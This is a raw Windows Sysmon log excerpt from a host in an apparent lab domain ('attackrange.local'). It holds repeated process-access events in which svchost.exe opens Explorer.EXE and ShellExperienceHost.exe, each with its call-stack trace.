07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
